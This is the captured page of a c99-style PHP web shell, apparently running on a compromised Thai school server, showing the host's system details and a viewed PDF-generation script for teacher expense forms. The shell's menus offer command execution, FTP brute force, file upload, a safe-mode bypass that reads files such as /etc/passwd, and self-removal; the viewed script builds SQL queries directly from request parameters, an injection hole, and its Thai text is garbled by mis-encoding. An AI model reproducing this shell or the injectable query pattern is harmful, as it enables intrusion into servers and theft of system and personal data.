!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 40.47 GB of 127.8 GB (31.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prePrintMoneyFormPDF-4.php (18.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
execQuery($query); $rss = $dbObj->fetchArray($result); $query = "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code LEFT JOIN training_tb ON personal_tb.Teacher_code = training_tb.Teacher_code LEFT JOIN formaoffice ON training_tb.Teacher_code = formaoffice.Teacher_code LEFT JOIN formofficemoney ON formaoffice.codeId = formofficemoney.codeId WHERE formofficemoney.maNo = '".$_REQUEST["maNo"]." ' and formofficemoney.Teacher_code = '".$_REQUEST["Flag"]." ' Group By formofficemoney.maNo , formofficemoney.Flag "; $result5 = $dbObj->execQuery($query); $rss5 = $dbObj->fetchArray($result5); $query3 = "Select * From college Where collegeStatus ='1'"; $result3 = $dbObj->execQuery($query3); $rs3 = $dbObj->fetchArray($result3); $query4 = "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code Where personal_tb.Faculty_code = '".$rs['Faculty_code']."' and personal_tb.TeacherId = '1'"; $result4 = $dbObj->execQuery($query4); $rs4 = $dbObj->fetchArray($result4); $query6 = " SELECT * FROM personal_tb AS pe LEFT JOIN formofficemoney AS fm ON pe.Teacher_code=fm.Teacher_code LEFT JOIN formaoffice AS fo ON fm.codeId=fo.codeId WHERE fm.maNo = '".$_REQUEST["maNo"]."' and fm.Flag = '".$_REQUEST["Flag"]."' "; $result6 = $dbObj->execQuery($query6); $num_rows = mysql_num_rows($result6); $query10 = " SELECT * FROM personal_tb AS pe LEFT JOIN formofficemoney AS fm ON pe.Teacher_code=fm.Teacher_code LEFT JOIN formaoffice AS fo ON fm.codeId=fo.codeId WHERE fm.maNo = '".$_REQUEST["maNo"]."' and fm.Flag = '".$_REQUEST["Flag"]."' "; $result10 = $dbObj->execQuery($query10); $num_rows10 = mysql_num_rows($result10); $query11 = " SELECT * FROM personal_tb AS pe LEFT JOIN formofficemoney AS fm ON pe.Teacher_code=fm.Teacher_code LEFT JOIN formaoffice AS fo ON fm.codeId=fo.codeId WHERE fm.maNo = '".$_REQUEST["maNo"]."' and fm.Flag = '".$_REQUEST["Flag"]."' "; $result11 = $dbObj->execQuery($query11); $num_rows11 = mysql_num_rows($result11); $query = " SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code WHERE personal_tb.Teacher_code='".$_REQUEST['Teacher_code']."'"; $result = $dbObj->execQuery($query); $rs = $dbObj->fetchArray($result); function readNumber($number, $len) { if($number=='0') { $number = ""; } else if($number=='1') { if($len==2) { $number = ""; } else { $number = "˹Öè§"; } } else if($number=='2') { if($len==2) { $number = "ÂÕè"; } else { $number = "Êͧ"; } } else if($number=='3') { $number = "ÊÒÁ"; } else if($number=='4') { $number = "ÊÕè"; } else if($number=='5') { $number = "ËéÒ"; } else if($number=='6') { $number = "Ë¡"; } else if($number=='7') { $number = "à¨ç´"; } else if($number=='8') { $number = "á»´"; } else if($number=='9') { $number = "à¡éÒ"; } return $number; } function readUnit($len) { if($len=='1') { $len = ""; } else if($len=='2') { $len = "ÊÔº"; } else if($len=='3') { $len = "ÃéÍÂ"; } else if($len=='4') { $len = "¾Ñ¹"; } else if($len=='5') { $len = "ËÁ×è¹"; } else if($len=='6') { $len = "áʹ"; } else if($len=='7') { $len = "ÅéÒ¹"; } return $len; } function convertNumberToString($amount) { list($baht, $satang) = split('[.]', $amount); while(strlen($satang) < 2) $satang .= '0'; $str = ""; $len = strlen($baht); $i = 0; while($i <= strlen($baht)) { if($len==1 && $baht[$i-1]!=0 && $baht[$i]==1) $str .= "àÍç´"; else $str .= readNumber($baht[$i], $len); if($baht[$i] != 0) $str .= readUnit($len); $len--; $i++; } if($str != "") $str .= "ºÒ·"; $len = strlen($satang); $i = 0; while($i <= strlen($satang)) { if($len==1 && $satang[$i-1]!=0 && $satang[$i]==1) $str .= "àÍç´"; else $str .= readNumber($satang[$i], $len); if($satang[$i] != 0) $str .= readUnit($len); $len--; $i++; } if($satang != '00') $str .= "ʵҧ¤ì"; return $str; } //---------------------------------------- function getMonthTh($mm) { if($mm=='01') { $mm='Á¡ÃÒ¤Á'; } else if($mm=='02') { $mm='¡ØÁÀҾѹ¸ì'; } else if($mm=='03') { $mm='ÁÕ¹Ò¤Á'; } else if($mm=='04') { $mm='àÁÉÒ¹'; } else if($mm=='05') { $mm='¾ÄÉÀÒ¤Á';} else if($mm=='06') { $mm='ÁԶعÒ¹'; } else if($mm=='07') { $mm='¡Ã¡®Ò¤Á'; } else if($mm=='08') { $mm='ÊÔ§ËÒ¤Á'; } else if($mm=='09') { $mm='¡Ñ¹ÂÒ¹'; } else if($mm=='10') { $mm='µØÅÒ¤Á';} else if($mm=='11') { $mm='¾ÄȨԡÒ¹';} else if($mm=='12') { $mm='¸Ñ¹ÇÒ¤Á'; } return "$mm"; } function getShortMonthTh($mm) { if($mm=='01') { $mm='Á.¤.'; } else if($mm=='02') { $mm='¡.¾.'; } else if($mm=='03') { $mm='ÁÕ.¤.'; } else if($mm=='04') { $mm='àÁ.Â.'; } else if($mm=='05') { $mm='¾.¤.';} else if($mm=='06') { $mm='ÁÔ.Â.'; } else if($mm=='07') { $mm='¡.¤.'; } else if($mm=='08') { $mm='Ê.¤.'; } else if($mm=='09') { $mm='¡.Â.'; } else if($mm=='10') { $mm='µ.¤.';} else if($mm=='11') { $mm='¾.Â.';} else if($mm=='12') { $mm='¸.¤.'; } return "$mm"; } //Create new pdf file $pdf = new FPDF('L' , 'mm' , 'A4'); //Set thai font $pdf->SetThaiFont(); $pdf->AddPage(); //-- Load Form Image to Background $pdf->Image('../form/FormMoney-4.jpg', 0, 0, 297, 210); //-- Set Font $pdf->SetFont('AngsanaNew','',15); //-- ÊèǹÃÒª¡Òà $pdf->Text(110,30,$rs3['collegeName']); //-- Set Font $pdf->SetFont('AngsanaNew','',15); //-- àºÔ¡¤èÒãªé¨èÒ¢ͧ - ª×èÍ ¹ÒÁÊ¡ØÅ ÍÒ¨ÒÃÂì $Teacher_code = $Flag ; $sql = "Select * From $myTable1 LEFT JOIN prefix ON $myTable1.First_name = prefix.prefixId Where Teacher_code ='$Teacher_code' "; $result8 = mysql_query($sql) or die("Error".mysql_error()); $rs8 = mysql_fetch_array($result8); $pdf->SetXY(100,33); $pdf->Cell(73,5,$rs8['prefixName'].' '.$rs8['Teacher_name'].' '.$rs8['Teacher_lastname'].' áÅФ³Ð',0,0,'C'); // ŧÇѹ·Õè $date = explode("-",$rss5['Date_start']); $day = intval($date[2]); $month = getMonthTh(intval($date[1])); $year = intval($date[0]); if(!empty($day)){ $pdf->SetXY(190.5,33); $pdf->Cell(9,5,$day,0,0,'C'); $pdf->SetXY(210,33); $pdf->Cell(23.5,5,$month,0,0,'C'); $pdf->SetXY(247,33); $pdf->Cell(12,5,$year,0,0,'C'); } else{ $pdf->SetXY(190.5,33); $pdf->Cell(9,5,'-',0,0,'C'); $pdf->SetXY(210,33); $pdf->Cell(23.5,5,'-',0,0,'C'); $pdf->SetXY(247,33); $pdf->Cell(12,5,'-',0,0,'C'); } $pdf->SetFont('AngsanaNew','',13); //-- ¤ÍÅÑÁ¹ì ª×èÍ - ¹ÒÁÊ¡ØÅ if($num_rows){ $i = 1; while($data = $dbObj->fetchObject($result6)){ $query7 = "Select * From $myTable1 LEFT JOIN prefix ON $myTable1.First_name = prefix.prefixId Where Teacher_code='".$data->Teacher_code."' "; $result7 = $dbObj->execQuery($query7); $rs7 = $dbObj->fetchArray($result7); switch($i){ case "1" : $pdf->Text(33,61,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "2" : $pdf->Text(33,68.3,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "3" : $pdf->Text(33,76.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "4" : $pdf->Text(33,83.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "5" : $pdf->Text(33,90.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "6" : $pdf->Text(33,97.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "7" : $pdf->Text(33,104.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "8" : $pdf->Text(33,111.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "9" : $pdf->Text(33,118.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "10" : $pdf->Text(33,125.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "11" : $pdf->Text(33,132.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; case "12" : $pdf->Text(33,139.5,$rs7['prefixName'].' '.$rs7['Teacher_name'].' '.$rs7['Teacher_lastname']); break; } $i++; } } if($num_rows10){ $j = 1; while($data1 = $dbObj->fetchObject($result10)){ $query9 = " Select * From personal_tb LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId WHERE Teacher_code='".$data1->Teacher_code."' "; $result9 = $dbObj->execQuery($query9); $rs9 = $dbObj->fetchArray($result9); switch($j){ case "1" : $pdf->Text(79,61,$rs9['Position_name']); break; case "2" : $pdf->Text(79,68.3,$rs9['Position_name']); break; case "3" : $pdf->Text(79,76.5,$rs9['Position_name']); break; case "4" : $pdf->Text(79,83.5,$rs9['Position_name']); break; case "5" : $pdf->Text(79,90.5,$rs9['Position_name']); break; case "6" : $pdf->Text(79,97.5,$rs9['Position_name']); break; case "7" : $pdf->Text(79,104.5,$rs9['Position_name']); break; case "8" : $pdf->Text(79,111.5,$rs9['Position_name']); break; case "9" : $pdf->Text(79,118.5,$rs9['Position_name']); break; case "10" : $pdf->Text(79,125.5,$rs9['Position_name']); break; case "11" : $pdf->Text(79,132.5,$rs9['Position_name']); break; case "12" : $pdf->Text(79,139.5,$rs9['Position_name']); break; } $j++; } } if($num_rows11){ $k = 1; while($data2 = $dbObj->fetchObject($result11)){ $query12 = " SELECT * FROM formofficemoney WHERE Teacher_code='".$data2->Teacher_code."' and maNo = '".$data2->maNo."' "; $result12 = $dbObj->execQuery($query12); $rs12 = $dbObj->fetchArray($result12); switch($k){ case "1" : $pdf->Text(128,61,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,61,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,61,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,61,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,61,number_format($rs12['Budget_use'],2,'.',',')); break; case "2" : $pdf->Text(128,68.3,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,68.3,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,68.3,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,68.3,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,68.3,number_format($rs12['Budget_use'],2,'.',',')); break; case "3" : $pdf->Text(128,76.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,76.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,76.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,76.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,76.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "4" : $pdf->Text(128,83.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,83.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,83.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,83.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,83.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "5" : $pdf->Text(128,90.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,90.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,90.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,90.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,90.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "6" : $pdf->Text(128,97.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,97.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,97.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,97.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,97.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "7" : $pdf->Text(128,104.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,104.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,104.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,104.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,104.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "8" : $pdf->Text(128,111.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,111.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,111.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,111.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,111.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "9" : $pdf->Text(128,118.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,118.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,118.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,118.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,118.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "10" : $pdf->Text(128,125.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,125.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,125.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,125.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,125.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "11" : $pdf->Text(128,132.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,132.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,132.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,132.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,132.5,number_format($rs12['Budget_use'],2,'.',',')); break; case "12" : $pdf->Text(128,139.5,number_format($rs12['Smtotal'],2,'.',',')); $pdf->Text(145,139.5,number_format($rs12['STtotal'],2,'.',',')); $pdf->Text(162,139.5,number_format($rs12['Vehicletotal'],2,'.',',')); $pdf->Text(182,139.5,number_format($rs12['Crgestotal'],2,'.',',')); $pdf->Text(200,139.5,number_format($rs12['Budget_use'],2,'.',',')); break; } $k++; } } //-- ¤èÒàºÕéÂàÅÕé§ $sql1 = " SELECT SUM(Smtotal) AS SumB1 FROM $myTable4 WHERE Flag='$Flag' and maNo='$maNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB1'])){ $pdf->SetXY(110,142.5); $pdf->Cell(45,5,number_format($rss1['SumB1'], 2, '.', ','),0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } //-- ¤èÒ·Õè¾Ñ¡ $sql1 = " SELECT SUM(STtotal) AS SumB2 FROM $myTable4 WHERE Flag='$Flag' and maNo='$maNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB2'])){ $pdf->SetXY(128,142.5); $pdf->Cell(45,5,number_format($rss1['SumB2'], 2, '.', ','),0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } //-- ¤èÒ¾Ò˹Р$sql1 = " SELECT SUM(Vehicletotal) AS SumB3 FROM $myTable4 WHERE Flag='$Flag' and maNo='$maNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB3'])){ $pdf->SetXY(144,142.5); $pdf->Cell(45,5,number_format($rss1['SumB3'], 2, '.', ','),0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } //-- ¤èÒÍ×è¹æ $sql1 = " SELECT SUM(Crgestotal) AS SumB4 FROM $myTable4 WHERE Flag='$Flag' and maNo='$maNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB4'])){ $pdf->SetXY(165.5,142.5); $pdf->Cell(45,5,number_format($rss1['SumB4'], 2, '.', ','),0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } // ¨Ó¹Ç¹à§Ô¹ $sql1 = " SELECT SUM(Budget_use) AS SumB5 FROM $myTable4 WHERE Flag='$Flag' and maNo='$maNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB5'])){ $pdf->SetXY(183,142.5); $pdf->Cell(45,5,number_format($rss1['SumB5'], 2, '.', ','),0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } // ¨Ó¹Ç¹à§Ô¹ (µÑÇÍÑ¡ÉÃ) if(!empty($rss1['SumB5'])){ $SumB5 = convertNumberToString($rss1['SumB5']); $pdf->SetXY(78,155); $pdf->Cell(45,5,$SumB5."¶éǹ",0,0,'C'); } else{ $pdf->SetXY(60,203); $pdf->Cell(45,5,'-',0,0,'C'); } //-- signature $pdf->SetXY(144,168.6); $pdf->Cell(51,5,$rs['First_name'].' '.$rs['Teacher_name'].' '.$rs['Teacher_lastname'],0,0,'C'); $pdf->SetXY(146.5,175.3); $pdf->Cell(49,5,$rs['Position_name'],0,0,'C'); $pdf->SetXY(146,209.8); $pdf->Cell(50,5,$rs4['First_name'].' '.$rs4['Teacher_name'].' '.$rs4['Teacher_lastname'],0,0,'C'); $pdf->SetXY(146.8,216.7); $pdf->Cell(49,5,$rs4['Position_name'],0,0,'C'); //Create file $pdf->Output(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--